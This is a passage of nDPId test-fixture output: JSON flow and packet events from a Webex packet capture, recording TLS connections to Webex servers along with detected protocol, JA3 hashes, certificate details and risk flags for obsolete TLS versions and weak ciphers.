-00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636259,"flow_last_seen":1444570636259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1444570636259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636259,"pkt":"ABoRAAACABoRAAABCABFAAA8u9ZAAEAGuzQKCAABQER5ZMv7AbtwVXkkAAAAAKACOQjQ2AAAAgQFtAQCCAoATMLyAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1444570636263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636263,"pkt":"ABoRAAACABoRAAABCABFAAAoAZpAABAGpYVARHlkCggAAQG7y\/uPqobbcFV5JVAS\/\/8eagAA"} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636264,"flow_last_seen":1444570636264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636264,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1444570636264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636264,"pkt":"ABoRAAACABoRAAABCABFAAA8YelAAEAGFSMKCAABQER5Y9qhAbtb96MaAAAAAKACOQismgAAAgQFtAQCCAoATMLzAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoAZtAABAGpYVARHljCggAAQG72qGkCFzlW\/ejG1AS\/\/8PxQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoNIhAAEAGU28KCAABQERojK3MAbt5hvZ3hnkJilAQOQgUagAA"} 
-00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo0S1AAEAGIvEKCAABch3Ki7gMAbtSShPerbXsI1AQOQh2UQAA"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo70NAAEAGj0QKCAABrfMETM36AbsKei209YXSTVAQOQjqzAAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAAou9dAAEAGu0cKCAABQER5ZMv7AbtwVXklj6qG3FAQOQjlYgAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636270,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAA879dAAEAGBrMKCAABch3IC7rhAbtuYS0jAAAAAKACOQivZQAAAgQFtAQCCAoATML0AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1444570636273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636273,"pkt":"ABoRAAACABoRAAABCABFAAAoAZ9AABAGJQByHcgLCggAAQG7uuGRntLcbmEtJFAS\/\/+vAwAA"} 
-00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1444570636274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636274,"pkt":"ABoRAAACABoRAAABCABFAAAoYepAAEAGFTYKCAABQER5Y9qhAbtb96MbpAhc5lAQOQjWvQAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1444570636275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636275,"pkt":"ABoRAAACABoRAAABCABFAAAo79hAAEAGBsYKCAABch3IC7rhAbtuYS0kkZ7S3VAQOQh1\/AAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636359,"flow_last_seen":1444570636359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636359,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1444570636359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636359,"pkt":"ABoRAAACABoRAAABCABFAAA86IFAAEAGnowKCAABQERpYciqAbsEZyp7AAAAAKACOQievAAAAgQFtAQCCAoATML6AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1444570636363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636363,"pkt":"ABoRAAACABoRAAABCABFAAAoAaNAABAGtX9ARGlhCggAAQG7yKr7mNWEBGcqfFAS\/\/8xvgAA"} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636364,"flow_last_seen":1444570636364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636364,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1444570636364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636364,"pkt":"ABoRAAACABoRAAABCABFAAA8Y+FAAEAGIywKCAABQERpYpEJAbvtraEaAAAAAKACOQh2dQAAAgQFtAQCCAoATML7AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAoAaRAABAGtX1ARGliCggAAQG7kQkSUl7l7a2hG1AS\/\/9pXgAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAo6IJAAEAGnp8KCAABQERpYciqAbsEZyp8+5jVhVAQOQj4tgAA"} 
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1444570636369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636369,"pkt":"ABoRAAACABoRAAABCABFAAAoY+JAAEAGIz8KCAABQERpYpEJAbvtraEbElJe5lAQOQgwVwAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636387,"flow_last_seen":1444570636387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636387,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1444570636387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636387,"pkt":"ABoRAAACABoRAAABCABFAAA82lhAAEAGrK8KCAABQERpZ6GqAbsG3RlZAAAAAKACOQjUWwAAAgQFtAQCCAoATMMBAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1444570636395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAoAadAABAGtXVARGlnCggAAQG7oar5IuamBt0ZWlAS\/\/9YuAAA"} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1444570636395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAo2llAAEAGrMIKCAABQERpZ6GqAbsG3Rla+SLmp1AQOQgfsQAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, 
OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
